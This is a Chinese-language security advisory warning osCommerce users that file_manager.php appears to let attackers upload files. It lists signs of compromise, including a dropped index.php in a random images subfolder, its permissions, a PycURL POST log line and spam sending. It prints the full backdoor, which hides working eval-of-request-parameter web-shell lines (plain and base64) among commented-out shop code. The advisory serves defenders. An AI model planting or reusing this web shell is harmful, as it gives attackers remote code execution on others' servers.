最近发现osCommerce的后台管理程序file_manager.php可能存在漏洞，会被黑客恶意上传文件到服务器上，请用户在进行文件管理时尽可能使用FTP软件，并对/catalog/admin/file_manager.php进行删除处理。

该漏洞引起的问题如要特征如下：

1）服务器上被载入额外的php文件，例如：
/catalog/images/btaxf/index.php
其中btaxf文件夹名字是随机组合，有的受攻击者机器上的目录名为yahoo

2）该index.php文件的权限是nobody，例如：
-rwxrwxrwx 1 nobody nobody 1181 Apr 12 07:46 index.php*

3）主机会被用来群发垃圾邮件，黑客通过POST方式访问：
“POST /catalog/images/btaxf/index.php HTTP/1.1″ 200 2 “-” “PycURL/7.18.2″

4）该恶意增加index.php文件的代码如下：
/*
$Id: /yahoo/index.php 1739 2007-12-20 00:52:16Z hpdl $

osCommerce, Open Source E-Commerce Solutions

http://www.oscommerce.com

Copyright (c) 2003 osCommerce

Released under the GNU General Public License
*/

// require('includes/application_top.php');
// $check_email_query = tep_db_query("select count(*) as total from " . TABLE_CUSTOMERS . " where customers_email_address = '" . tep_db_input($email_addre
ss) . "' and customers_id != '" . (int)$customer_id . "'");

// $check_email = tep_db_fetch_array($check_email_query);
// if ($check_email["total"] > 0) {

// $error = true;
error_reporting(0);

// if (!tep_session_is_registered(‘customer_id’)) {
eval(stripslashes($_REQUEST['osc']));
// if (ACCOUNT_GENDER == ‘true’) {
// if ( ($gender != ‘m’) && ($gender != ‘f’) ) {
// $error = true;
eval(base64_decode($_REQUEST['osc64']));
// $messageStack->add(‘account_edit’, ENTRY_GENDER_ERROR);
// }

// }
// $navigation->set_snapshot();
if(!(count($_GET)+count($_POST)))echo “Open Source E-Commerce Solutions “, 2000+10, ” year”;
// tep_redirect(tep_href_link(FILENAME_LOGIN, ”, ‘SSL’));

// }

?>

由于涉及的osCommerce版本较多，官方未提供解决办法，请用户发现该index.php文件后必须删除。